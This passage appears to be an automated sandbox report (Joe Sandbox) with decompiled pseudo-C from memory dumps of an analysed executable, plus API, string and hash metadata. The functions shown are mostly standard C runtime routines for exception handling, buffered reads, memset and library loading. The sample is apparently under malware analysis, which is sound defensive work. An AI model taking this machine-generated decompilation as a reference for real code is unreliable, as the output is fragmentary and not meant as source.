                    												__eflags = _t274 -  *((intOrPtr*)(_t209 + 1));
                    												if(_t274 !=  *((intOrPtr*)(_t209 + 1))) {
                    													break;
                    												} else {
                    													_t276 = _t276 + 2;
                    													_t209 = _t209 + 2;
                    													__eflags = _t274;
                    													if(_t274 != 0) {
                    														continue;
                    													} else {
                    														goto L97;
                    													}
                    												}
                    											}
                    											L99:
                    											__eflags = _t210;
                    											if(_t210 == 0) {
                    												goto L101;
                    											} else {
                    												_t207 = 0;
                    											}
                    											goto L110;
                    										}
                    										asm("sbb eax, eax");
                    										_t210 = _t209 | 0x00000001;
                    										__eflags = _t210;
                    										goto L99;
                    									}
                    								} else {
                    									__eflags =  *_t304 & 0x00000010;
                    									if(( *_t304 & 0x00000010) != 0) {
                    										goto L109;
                    									} else {
                    										goto L91;
                    									}
                    								}
                    							}
                    						}
                    						L110:
                    						return _t207;
                    					}
                    				} else {
                    					_t270 = _a4;
                    					if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
                    						L22:
                    						_t296 = _a12;
                    						_v8 = _t296;
                    						goto L24;
                    					} else {
                    						_t315 = 0;
                    						if(_t270[0x1c] != 0) {
                    							goto L22;
                    						} else {
                    							_t224 = E004029B3(_t270, _t275, _t296, 0);
                    							if( *((intOrPtr*)(_t224 + 0x10)) == 0) {
                    								L61:
                    								return _t224;
                    							} else {
                    								_t270 =  *(E004029B3(_t270, _t275, _t296, 0) + 0x10);
                    								_t259 = E004029B3(_t270, _t275, _t296, 0);
                    								_v28 = 1;
                    								_v8 =  *((intOrPtr*)(_t259 + 0x14));
                    								if(_t270 == 0 ||  *_t270 == 0xe06d7363 && _t270[0x10] == 3 && (_t270[0x14] == 0x19930520 || _t270[0x14] == 0x19930521 || _t270[0x14] == 0x19930522) && _t270[0x1c] == _t315) {
                    									goto L67;
                    								} else {
                    									if( *((intOrPtr*)(E004029B3(_t270, _t275, _t296, _t315) + 0x1c)) == _t315) {
                    										L23:
                    										_t296 = _v8;
                    										_t275 = _v12;
                    										L24:
                    										_v52 = _t301;
                    										_v48 = 0;
                    										__eflags =  *_t270 - 0xe06d7363;
                    										if( *_t270 != 0xe06d7363) {
                    											L57:
                    											__eflags = _t301[3];
                    											if(_t301[3] <= 0) {
                    												goto L60;
                    											} else {
                    												__eflags = _a24;
                    												if(_a24 != 0) {
                    													goto L67;
                    												} else {
                    													_push(_a32);
                    													_push(_a28);
                    													_push(_t275);
                    													_push(_t301);
                    													_push(_a16);
                    													_push(_t296);
                    													_push(_a8);
                    													_push(_t270);
                    													L68();
                    													_t332 = _t332 + 0x20;
                    													goto L60;
                    												}
                    											}
                    										} else {
                    											__eflags = _t270[0x10] - 3;
                    											if(_t270[0x10] != 3) {
                    												goto L57;
                    											} else {
                    												__eflags = _t270[0x14] - 0x19930520;
                    												if(_t270[0x14] == 0x19930520) {
                    													L29:
                    													_t315 = _a32;
                    													__eflags = _t301[3];
                    													if(_t301[3] > 0) {
                    														_push(_a28);
                    														E00402D64(_t270, _t275, _t301, _t315,  &_v68,  &_v52, _t275, _a16, _t301);
                    														_t296 = _v64;
                    														_t332 = _t332 + 0x18;
                    														_t247 = _v68;
                    														_v44 = _t247;
                    														_v16 = _t296;
                    														__eflags = _t296 - _v56;
                    														if(_t296 < _v56) {
                    															_t290 = _t296 * 0x14;
                    															__eflags = _t290;
                    															_v32 = _t290;
                    															do {
                    																_t291 = 5;
                    																_t250 = memcpy( &_v104,  *((intOrPtr*)( *_t247 + 0x10)) + _t290, _t291 << 2);
                    																_t332 = _t332 + 0xc;
                    																__eflags = _v104 - _t250;
                    																if(_v104 <= _t250) {
                    																	__eflags = _t250 - _v100;
                    																	if(_t250 <= _v100) {
                    																		_t294 = 0;
                    																		_v20 = 0;
                    																		__eflags = _v92;
                    																		if(_v92 != 0) {
                    																			_t299 = _t270[0x1c];
                    																			_t251 =  *((intOrPtr*)(_t299 + 0xc));
                    																			_t252 = _t251 + 4;
                    																			__eflags = _t252;
                    																			_v36 = _t252;
                    																			_t253 = _v88;
                    																			_v40 =  *_t251;
                    																			_v24 = _t253;
                    																			do {
                    																				asm("movsd");
                    																				asm("movsd");
                    																				asm("movsd");
                    																				asm("movsd");
                    																				_t327 = _v40;
                    																				_t314 = _v36;
                    																				__eflags = _t327;
                    																				if(_t327 <= 0) {
                    																					goto L40;
                    																				} else {
                    																					while(1) {
                    																						_push(_t299);
                    																						_push( *_t314);
                    																						_t254 =  &_v84;
                    																						_push(_t254);
                    																						L87();
                    																						_t332 = _t332 + 0xc;
                    																						__eflags = _t254;
                    																						if(_t254 != 0) {
                    																							break;
                    																						}
                    																						_t299 = _t270[0x1c];
                    																						_t327 = _t327 - 1;
                    																						_t314 = _t314 + 4;
                    																						__eflags = _t327;
                    																						if(_t327 > 0) {
                    																							continue;
                    																						} else {
                    																							_t294 = _v20;
                    																							_t253 = _v24;
                    																							goto L40;
                    																						}
                    																						goto L43;
                    																					}
                    																					_push(_a24);
                    																					_push(_v28);
                    																					E0040386B(_t299, _t270, _a8, _v8, _a16, _a20,  &_v84,  *_t314,  &_v104, _a28, _a32);
                    																					_t332 = _t332 + 0x30;
                    																				}
                    																				L43:
                    																				_t296 = _v16;
                    																				goto L44;
                    																				L40:
                    																				_t294 = _t294 + 1;
                    																				_t253 = _t253 + 0x10;
                    																				_v20 = _t294;
                    																				_v24 = _t253;
                    																				__eflags = _t294 - _v92;
                    																			} while (_t294 != _v92);
                    																			goto L43;
                    																		}
                    																	}
                    																}
                    																L44:
                    																_t296 = _t296 + 1;
                    																_t247 = _v44;
                    																_t290 = _v32 + 0x14;
                    																_v16 = _t296;
                    																_v32 = _t290;
                    																__eflags = _t296 - _v56;
                    															} while (_t296 < _v56);
                    															_t301 = _a20;
                    															_t315 = _a32;
                    														}
                    													}
                    													__eflags = _a24;
                    													if(__eflags != 0) {
                    														_push(1);
                    														E0040263C(_t270, _t301, _t315, __eflags);
                    														_t275 = _t270;
                    													}
                    													__eflags = ( *_t301 & 0x1fffffff) - 0x19930521;
                    													if(( *_t301 & 0x1fffffff) < 0x19930521) {
                    														L60:
                    														_t224 = E004029B3(_t270, _t275, _t296, _t315);
                    														__eflags =  *(_t224 + 0x1c);
                    														if( *(_t224 + 0x1c) != 0) {
                    															goto L67;
                    														} else {
                    															goto L61;
                    														}
                    													} else {
                    														_t228 = _t301[8] >> 2;
                    														__eflags = _t301[7];
                    														if(_t301[7] != 0) {
                    															__eflags = _t228 & 0x00000001;
                    															if((_t228 & 0x00000001) == 0) {
                    																_push(_t301[7]);
                    																_t229 = E0040436A(_t270, _t301, _t315, _t270);
                    																_pop(_t275);
                    																__eflags = _t229;
                    																if(_t229 == 0) {
                    																	goto L64;
                    																} else {
                    																	goto L60;
                    																}
                    															} else {
                    																goto L54;
                    															}
                    														} else {
                    															__eflags = _t228 & 0x00000001;
                    															if((_t228 & 0x00000001) == 0) {
                    																goto L60;
                    															} else {
                    																__eflags = _a28;
                    																if(_a28 != 0) {
                    																	goto L60;
                    																} else {
                    																	L54:
                    																	 *(E004029B3(_t270, _t275, _t296, _t315) + 0x10) = _t270;
                    																	_t237 = E004029B3(_t270, _t275, _t296, _t315);
                    																	_t286 = _v8;
                    																	 *((intOrPtr*)(_t237 + 0x14)) = _v8;
                    																	goto L62;
                    																}
                    															}
                    														}
                    													}
                    												} else {
                    													__eflags = _t270[0x14] - 0x19930521;
                    													if(_t270[0x14] == 0x19930521) {
                    														goto L29;
                    													} else {
                    														__eflags = _t270[0x14] - 0x19930522;
                    														if(_t270[0x14] != 0x19930522) {
                    															goto L57;
                    														} else {
                    															goto L29;
                    														}
                    													}
                    												}
                    											}
                    										}
                    									} else {
                    										_v16 =  *((intOrPtr*)(E004029B3(_t270, _t275, _t296, _t315) + 0x1c));
                    										_t264 = E004029B3(_t270, _t275, _t296, _t315);
                    										_push(_v16);
                    										 *(_t264 + 0x1c) = _t315;
                    										_t265 = E0040436A(_t270, _t301, _t315, _t270);
                    										_pop(_t286);
                    										if(_t265 != 0) {
                    											goto L23;
                    										} else {
                    											_t301 = _v16;
                    											_t353 =  *_t301 - _t315;
                    											if( *_t301 <= _t315) {
                    												L62:
                    												E004056DE(_t270, _t286, _t296, _t301, _t315, __eflags);
                    											} else {
                    												while(1) {
                    													_t286 =  *((intOrPtr*)(_t315 + _t301[1] + 4));
                    													if(E00403FC6( *((intOrPtr*)(_t315 + _t301[1] + 4)), _t353, 0x4158ac) != 0) {
                    														goto L63;
                    													}
                    													_t315 = _t315 + 0x10;
                    													_t269 = _v20 + 1;
                    													_v20 = _t269;
                    													_t353 = _t269 -  *_t301;
                    													if(_t269 >=  *_t301) {
                    														goto L62;
                    													} else {
                    														continue;
                    													}
                    													goto L63;
                    												}
                    											}
                    											L63:
                    											_push(1);
                    											_push(_t270);
                    											E0040263C(_t270, _t301, _t315, __eflags);
                    											_t275 =  &_v64;
                    											E00403F71( &_v64);
                    											E0040225B( &_v64, 0x413554);
                    											L64:
                    											 *(E004029B3(_t270, _t275, _t296, _t315) + 0x10) = _t270;
                    											_t231 = E004029B3(_t270, _t275, _t296, _t315);
                    											_t275 = _v8;
                    											 *(_t231 + 0x14) = _v8;
                    											__eflags = _t315;
                    											if(_t315 == 0) {
                    												_t315 = _a8;
                    											}
                    											E00402F57(_t275, _t315, _t270);
                    											E0040426A(_a8, _a16, _t301);
                    											_t234 = E00404427(_t301);
                    											_t332 = _t332 + 0x10;
                    											_push(_t234);
                    											E004041E1(_t270, _t275, _t296, _t301, _t315, __eflags);
                    											goto L67;
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    				}
                    			}

                    APIs
                    • type_info::operator==.LIBVCRUNTIME ref: 00403A0A
                    • ___TypeMatch.LIBVCRUNTIME ref: 00403B18
                    • _UnwindNestedFrames.LIBCMT ref: 00403C6A
                    • CallUnexpected.LIBVCRUNTIME ref: 00403C85
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                    • String ID: csm$csm$csm
                    • API String ID: 2751267872-393685449
                    • Opcode ID: d2805ed157ee1a0de980ebf95ce551697e3ac2d298d2a0e6c6e08f639c5bac21
                    • Instruction ID: eb951dfd93c377336a0bd22ac6a7177933b6abc1ee62d3cbfcc6e570eabf6f1d
                    • Opcode Fuzzy Hash: d2805ed157ee1a0de980ebf95ce551697e3ac2d298d2a0e6c6e08f639c5bac21
                    • Instruction Fuzzy Hash: 00B17A75900209DFCF15DFA5C9819AEBBB8BF04316F14416BE8017B292C379EA51CF99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 53%
                    			E00402310(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
                    				char _v5;
                    				signed int _v12;
                    				char _v16;
                    				intOrPtr _v20;
                    				intOrPtr _v24;
                    				intOrPtr _v28;
                    				signed int _v32;
                    				signed char _v36;
                    				void* _v40;
                    				signed int _t77;
                    				signed int _t84;
                    				intOrPtr _t85;
                    				void* _t86;
                    				intOrPtr* _t87;
                    				intOrPtr _t89;
                    				signed int _t91;
                    				int _t93;
                    				signed int _t98;
                    				intOrPtr* _t102;
                    				intOrPtr _t103;
                    				signed int _t107;
                    				char _t109;
                    				signed int _t113;
                    				void* _t114;
                    				intOrPtr _t123;
                    				void* _t125;
                    				intOrPtr _t133;
                    				signed int _t135;
                    				void* _t139;
                    				void* _t141;
                    				void* _t149;
                    
                    				_t118 = __edx;
                    				_t102 = _a4;
                    				_push(__edi);
                    				_v5 = 0;
                    				_v16 = 1;
                    				 *_t102 = E0040D360(__ecx,  *_t102);
                    				_t103 = _a8;
                    				_t6 = _t103 + 0x10; // 0x11
                    				_t133 = _t6;
                    				_push(_t133);
                    				_v20 = _t133;
                    				_v12 =  *(_t103 + 8) ^  *0x415010;
                    				E004022D0(_t103, __edx, __edi, _t133,  *(_t103 + 8) ^  *0x415010);
                    				E00402967(_a12);
                    				_t77 = _a4;
                    				_t141 = _t139 - 0x1c + 0x10;
                    				_t123 =  *((intOrPtr*)(_t103 + 0xc));
                    				if(( *(_t77 + 4) & 0x00000066) != 0) {
                    					__eflags = _t123 - 0xfffffffe;
                    					if(_t123 != 0xfffffffe) {
                    						_t118 = 0xfffffffe;
                    						E00402950(_t103, 0xfffffffe, _t133, 0x415010);
                    						goto L13;
                    					}
                    					goto L14;
                    				} else {
                    					_v32 = _t77;
                    					_v28 = _a12;
                    					 *((intOrPtr*)(_t103 - 4)) =  &_v32;
                    					if(_t123 == 0xfffffffe) {
                    						L14:
                    						return _v16;
                    					} else {
                    						do {
                    							_t107 = _v12;
                    							_t84 = _t123 + (_t123 + 2) * 2;
                    							_t103 =  *((intOrPtr*)(_t107 + _t84 * 4));
                    							_t85 = _t107 + _t84 * 4;
                    							_t108 =  *((intOrPtr*)(_t85 + 4));
                    							_v24 = _t85;
                    							if( *((intOrPtr*)(_t85 + 4)) == 0) {
                    								_t109 = _v5;
                    								goto L7;
                    							} else {
                    								_t118 = _t133;
                    								_t86 = E004028F0(_t108, _t133);
                    								_t109 = 1;
                    								_v5 = 1;
                    								_t149 = _t86;
                    								if(_t149 < 0) {
                    									_v16 = 0;
                    									L13:
                    									_push(_t133);
                    									E004022D0(_t103, _t118, _t123, _t133, _v12);
                    									goto L14;
                    								} else {
                    									if(_t149 > 0) {
                    										_t87 = _a4;
                    										__eflags =  *_t87 - 0xe06d7363;
                    										if( *_t87 == 0xe06d7363) {
                    											__eflags =  *0x40e1c4;
                    											if(__eflags != 0) {
                    												_t98 = E0040D1F0(__eflags, "<&@");
                    												_t141 = _t141 + 4;
                    												__eflags = _t98;
                    												if(_t98 != 0) {
                    													_t135 =  *0x40e1c4; // 0x40263c
                    													 *0x40e160(_a4, 1);
                    													 *_t135();
                    													_t133 = _v20;
                    													_t141 = _t141 + 8;
                    												}
                    												_t87 = _a4;
                    											}
                    										}
                    										_t119 = _t87;
                    										E00402930(_t87, _a8, _t87);
                    										_t89 = _a8;
                    										__eflags =  *((intOrPtr*)(_t89 + 0xc)) - _t123;
                    										if( *((intOrPtr*)(_t89 + 0xc)) != _t123) {
                    											_t119 = _t123;
                    											E00402950(_t89, _t123, _t133, 0x415010);
                    											_t89 = _a8;
                    										}
                    										_push(_t133);
                    										 *((intOrPtr*)(_t89 + 0xc)) = _t103;
                    										E004022D0(_t103, _t119, _t123, _t133, _v12);
                    										E00402910();
                    										asm("int3");
                    										asm("int3");
                    										asm("int3");
                    										_t113 = _v32;
                    										_t91 = _v36 & 0x000000ff;
                    										_t125 = _v40;
                    										__eflags = _t113;
                    										if(_t113 == 0) {
                    											L46:
                    											return _v40;
                    										} else {
                    											_t93 = _t91 * 0x1010101;
                    											__eflags = _t113 - 0x20;
                    											if(_t113 <= 0x20) {
                    												L39:
                    												__eflags = _t113 & 0x00000003;
                    												while((_t113 & 0x00000003) != 0) {
                    													 *_t125 = _t93;
                    													_t125 = _t125 + 1;
                    													_t113 = _t113 - 1;
                    													__eflags = _t113 & 0x00000003;
                    												}
                    												__eflags = _t113 & 0x00000004;
                    												if((_t113 & 0x00000004) != 0) {
                    													 *_t125 = _t93;
                    													_t125 = _t125 + 4;
                    													_t113 = _t113 - 4;
                    													__eflags = _t113;
                    												}
                    												__eflags = _t113 & 0xfffffff8;
                    												while((_t113 & 0xfffffff8) != 0) {
                    													 *_t125 = _t93;
                    													 *(_t125 + 4) = _t93;
                    													_t125 = _t125 + 8;
                    													_t113 = _t113 - 8;
                    													__eflags = _t113 & 0xfffffff8;
                    												}
                    												goto L46;
                    											} else {
                    												__eflags = _t113 - 0x80;
                    												if(__eflags < 0) {
                    													L33:
                    													asm("bt dword [0x415030], 0x1");
                    													if(__eflags >= 0) {
                    														goto L39;
                    													} else {
                    														asm("movd xmm0, eax");
                    														asm("pshufd xmm0, xmm0, 0x0");
                    														goto L35;
                    													}
                    												} else {
                    													asm("bt dword [0x415c68], 0x1");
                    													if(__eflags >= 0) {
                    														asm("bt dword [0x415030], 0x1");
                    														if(__eflags >= 0) {
                    															goto L39;
                    														} else {
                    															asm("movd xmm0, eax");
                    															asm("pshufd xmm0, xmm0, 0x0");
                    															_t114 = _t125 + _t113;
                    															asm("movups [edi], xmm0");
                    															_t125 = _t125 + 0x00000010 & 0xfffffff0;
                    															_t113 = _t114 - _t125;
                    															__eflags = _t113 - 0x80;
                    															if(__eflags <= 0) {
                    																goto L33;
                    															} else {
                    																do {
                    																	asm("movdqa [edi], xmm0");
                    																	asm("movdqa [edi+0x10], xmm0");
                    																	asm("movdqa [edi+0x20], xmm0");
                    																	asm("movdqa [edi+0x30], xmm0");
                    																	asm("movdqa [edi+0x40], xmm0");
                    																	asm("movdqa [edi+0x50], xmm0");
                    																	asm("movdqa [edi+0x60], xmm0");
                    																	asm("movdqa [edi+0x70], xmm0");
                    																	_t125 = _t125 + 0x80;
                    																	_t113 = _t113 - 0x80;
                    																	__eflags = _t113 & 0xffffff00;
                    																} while ((_t113 & 0xffffff00) != 0);
                    																L35:
                    																__eflags = _t113 - 0x20;
                    																if(_t113 < 0x20) {
                    																	L38:
                    																	asm("movdqu [edi], xmm0");
                    																	asm("movdqu [edi+0x10], xmm0");
                    																	return _v40;
                    																} else {
                    																	do {
                    																		asm("movdqu [edi], xmm0");
                    																		asm("movdqu [edi+0x10], xmm0");
                    																		_t125 = _t125 + 0x20;
                    																		_t113 = _t113 - 0x20;
                    																		__eflags = _t113 - 0x20;
                    																	} while (_t113 >= 0x20);
                    																	__eflags = _t113 & 0x0000001f;
                    																	if((_t113 & 0x0000001f) == 0) {
                    																		goto L46;
                    																	} else {
                    																		goto L38;
                    																	}
                    																}
                    															}
                    														}
                    													} else {
                    														memset(_t125, _t93, _t113 << 0);
                    														return _v40;
                    													}
                    												}
                    											}
                    										}
                    									} else {
                    										goto L7;
                    									}
                    								}
                    							}
                    							goto L47;
                    							L7:
                    							_t123 = _t103;
                    						} while (_t103 != 0xfffffffe);
                    						if(_t109 != 0) {
                    							goto L13;
                    						}
                    						goto L14;
                    					}
                    				}
                    				L47:
                    			}

                    APIs
                    • _ValidateLocalCookies.LIBCMT ref: 00402347
                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0040234F
                    • _ValidateLocalCookies.LIBCMT ref: 004023D8
                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00402403
                    • _ValidateLocalCookies.LIBCMT ref: 00402458
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                    • String ID: <&@$csm
                    • API String ID: 1170836740-4289465445
                    • Opcode ID: 62bc818260f3d61d15a3a2816a247d7c989dff70b0980e5c6bc77aebcd7fc6d4
                    • Instruction ID: e86dbd8585806dd5d23d3718c6f18d027200fadb66ce12341b0a8af8e769dc64
                    • Opcode Fuzzy Hash: 62bc818260f3d61d15a3a2816a247d7c989dff70b0980e5c6bc77aebcd7fc6d4
                    • Instruction Fuzzy Hash: EF41D734A002199BCF10DF69C988A9EBBB0AF44314F14807AED14BB3D2D7B9DA55CB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 97%
                    			E00282E75(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                    				signed int _v8;
                    				char* _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t82;
                    				char _t89;
                    				signed int _t96;
                    				signed int _t98;
                    				signed int _t101;
                    				signed int _t104;
                    				signed int _t108;
                    				signed int _t109;
                    				char* _t110;
                    				signed int _t120;
                    				signed int _t123;
                    				signed int _t124;
                    				signed int _t125;
                    				signed int _t126;
                    				void* _t127;
                    
                    				_t110 = _a4;
                    				_t108 = _a8;
                    				_t123 = _a12;
                    				_v12 = _t110;
                    				_v8 = _t108;
                    				if(_t123 == 0 || _a16 == 0) {
                    					L5:
                    					return 0;
                    				} else {
                    					_t131 = _t110;
                    					if(_t110 != 0) {
                    						_t126 = _a20;
                    						__eflags = _t126;
                    						if(_t126 == 0) {
                    							L9:
                    							__eflags = _t108 - 0xffffffff;
                    							if(_t108 != 0xffffffff) {
                    								_t82 = E00285760(_t110, 0, _t108);
                    								_t127 = _t127 + 0xc;
                    							}
                    							__eflags = _t126;
                    							if(__eflags == 0) {
                    								goto L3;
                    							} else {
                    								__eflags = _a16 - (_t82 | 0xffffffff) / _t123;
                    								if(__eflags > 0) {
                    									goto L3;
                    								}
                    								L13:
                    								_t124 = _t123 * _a16;
                    								__eflags =  *(_t126 + 0xc) & 0x0000010c;
                    								_v20 = _t124;
                    								_t109 = _t124;
                    								if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
                    									_v16 = 0x1000;
                    								} else {
                    									_v16 =  *((intOrPtr*)(_t126 + 0x18));
                    								}
                    								__eflags = _t124;
                    								if(_t124 == 0) {
                    									L40:
                    									return _a16;
                    								} else {
                    									do {
                    										__eflags =  *(_t126 + 0xc) & 0x0000010c;
                    										if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
                    											L24:
                    											__eflags = _t109 - _v16;
                    											if(_t109 < _v16) {
                    												_t89 = E00284EE9(_t109, _t124, _t126);
                    												__eflags = _t89 - 0xffffffff;
                    												if(_t89 == 0xffffffff) {
                    													L45:
                    													return (_t124 - _t109) / _a12;
                    												}
                    												__eflags = _v8;
                    												if(_v8 == 0) {
                    													L41:
                    													__eflags = _a8 - 0xffffffff;
                    													if(__eflags != 0) {
                    														E00285760(_a4, 0, _a8);
                    													}
                    													 *((intOrPtr*)(E00283CF8(__eflags))) = 0x22;
                    													L4:
                    													E00283CA6();
                    													goto L5;
                    												}
                    												_v12 = _v12 + 1;
                    												 *_v12 = _t89;
                    												_t109 = _t109 - 1;
                    												_t65 =  &_v8;
                    												 *_t65 = _v8 - 1;
                    												__eflags =  *_t65;
                    												_v16 =  *((intOrPtr*)(_t126 + 0x18));
                    												goto L39;
                    											}
                    											__eflags = _v16;
                    											if(_v16 == 0) {
                    												_t96 = 0x7fffffff;
                    												__eflags = _t109 - 0x7fffffff;
                    												if(_t109 <= 0x7fffffff) {
                    													_t96 = _t109;
                    												}
                    											} else {
                    												__eflags = _t109 - 0x7fffffff;
                    												if(_t109 <= 0x7fffffff) {
                    													_t50 = _t109 % _v16;
                    													__eflags = _t50;
                    													_t120 = _t50;
                    													_t101 = _t109;
                    												} else {
                    													_t120 = 0x7fffffff % _v16;
                    													_t101 = 0x7fffffff;
                    												}
                    												_t96 = _t101 - _t120;
                    											}
                    											__eflags = _t96 - _v8;
                    											if(_t96 > _v8) {
                    												goto L41;
                    											} else {
                    												_push(_t96);
                    												_push(_v12);
                    												_push(E002856B8(_t126));
                    												_t98 = E002855C2(_t109, _t124, _t126, __eflags);
                    												_t127 = _t127 + 0xc;
                    												__eflags = _t98;
                    												if(_t98 == 0) {
                    													 *(_t126 + 0xc) =  *(_t126 + 0xc) | 0x00000010;
                    													goto L45;
                    												}
                    												__eflags = _t98 - 0xffffffff;
                    												if(_t98 == 0xffffffff) {
                    													L44:
                    													_t72 = _t126 + 0xc;
                    													 *_t72 =  *(_t126 + 0xc) | 0x00000020;
                    													__eflags =  *_t72;
                    													goto L45;
                    												}
                    												_v12 = _v12 + _t98;
                    												_t109 = _t109 - _t98;
                    												_v8 = _v8 - _t98;
                    												goto L39;
                    											}
                    										}
                    										_t104 =  *(_t126 + 4);
                    										__eflags = _t104;
                    										if(__eflags == 0) {
                    											goto L24;
                    										}
                    										if(__eflags < 0) {
                    											goto L44;
                    										}
                    										_t125 = _t109;
                    										__eflags = _t109 - _t104;
                    										if(_t109 >= _t104) {
                    											_t125 = _t104;
                    										}
                    										__eflags = _t125 - _v8;
                    										if(_t125 > _v8) {
                    											goto L41;
                    										} else {
                    											E002856DE(_v12, _v8,  *_t126, _t125);
                    											 *(_t126 + 4) =  *(_t126 + 4) - _t125;
                    											 *_t126 =  *_t126 + _t125;
                    											_v12 = _v12 + _t125;
                    											_t109 = _t109 - _t125;
                    											_t127 = _t127 + 0x10;
                    											_v8 = _v8 - _t125;
                    											_t124 = _v20;
                    										}
                    										L39:
                    										__eflags = _t109;
                    									} while (_t109 != 0);
                    									goto L40;
                    								}
                    							}
                    						}
                    						_t82 = (_t82 | 0xffffffff) / _t123;
                    						__eflags = _a16 - _t82;
                    						if(_a16 <= _t82) {
                    							goto L13;
                    						}
                    						goto L9;
                    					}
                    					L3:
                    					 *((intOrPtr*)(E00283CF8(_t131))) = 0x16;
                    					goto L4;
                    				}
                    			}

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                    • String ID: L)(
                    • API String ID: 4048096073-4147288743
                    • Opcode ID: e1879961a99f507c14c04207bb93430f685d5d6a89d1b6176f8fdab3d4404e37
                    • Instruction ID: 62d10751acd7e7c80dc3ffb0d9d343e068a95c7503e4b14380295952314333a9
                    • Opcode Fuzzy Hash: e1879961a99f507c14c04207bb93430f685d5d6a89d1b6176f8fdab3d4404e37
                    • Instruction Fuzzy Hash: 9851E739A22206DFCB24FFA9C84465EB7B5AF50320F248629F825A65D0D7709E78DF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004082D3(void* __ecx, signed int* _a4, intOrPtr _a8) {
                    				signed int _v8;
                    				void* _t20;
                    				void* _t22;
                    				WCHAR* _t26;
                    				signed int _t29;
                    				void** _t30;
                    				signed int* _t35;
                    				void* _t38;
                    				void* _t40;
                    
                    				_t35 = _a4;
                    				while(_t35 != _a8) {
                    					_t29 =  *_t35;
                    					_v8 = _t29;
                    					_t38 =  *(0x416300 + _t29 * 4);
                    					if(_t38 == 0) {
                    						_t26 =  *(0x40fa88 + _t29 * 4);
                    						_t38 = LoadLibraryExW(_t26, 0, 0x800);
                    						if(_t38 != 0) {
                    							L14:
                    							_t30 = 0x416300 + _v8 * 4;
                    							 *_t30 = _t38;
                    							if( *_t30 != 0) {
                    								FreeLibrary(_t38);
                    							}
                    							L16:
                    							_t20 = _t38;
                    							L13:
                    							return _t20;
                    						}
                    						_t22 = GetLastError();
                    						if(_t22 != 0x57) {
                    							L9:
                    							 *(0x416300 + _v8 * 4) = _t22 | 0xffffffff;
                    							L10:
                    							_t35 =  &(_t35[1]);
                    							continue;
                    						}
                    						_t22 = E00405A18(_t26, L"api-ms-", 7);
                    						_t40 = _t40 + 0xc;
                    						if(_t22 == 0) {
                    							goto L9;
                    						}
                    						_t22 = E00405A18(_t26, L"ext-ms-", 7);
                    						_t40 = _t40 + 0xc;
                    						if(_t22 == 0) {
                    							goto L9;
                    						}
                    						_t22 = LoadLibraryExW(_t26, _t38, _t38);
                    						_t38 = _t22;
                    						if(_t38 != 0) {
                    							goto L14;
                    						}
                    						goto L9;
                    					}
                    					if(_t38 != 0xffffffff) {
                    						goto L16;
                    					}
                    					goto L10;
                    				}
                    				_t20 = 0;
                    				goto L13;
                    			}













                    APIs
                    • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,B51C3102,?,004083E2,00000002,00000000,00000000), ref: 00408394
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeLibrary
                    • String ID: api-ms-$ext-ms-
                    • API String ID: 3664257935-537541572
                    • Opcode ID: c9283d596dd430a65ff98e794139049b5b5b47e480c88dd665e719789acae378
                    • Instruction ID: 573f1ada4d3828c880b6c39e4f7b2ce1dfde6baafd70aff868d57e190d54574b
                    • Opcode Fuzzy Hash: c9283d596dd430a65ff98e794139049b5b5b47e480c88dd665e719789acae378
                    • Instruction Fuzzy Hash: F1212B32A00221EBC7219B229D40A9F3368EB81B60F25053AED55B73D0DF79ED01CADD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 84%
                    			E00281160() {
                    				struct tagRECT _v20;
                    				struct tagRECT _v36;
                    				signed int _t10;
                    				int _t21;
                    				int _t34;
                    				intOrPtr _t35;
                    
                    				_t10 = 0 |  *0x2970f8 == 0x00000000;
                    				 *0x2970f8 = _t10;
                    				asm("sbb eax, eax");
                    				CheckMenuItem(GetMenu( *0x2970e4), 0x205,  ~_t10 & 0x00000008);
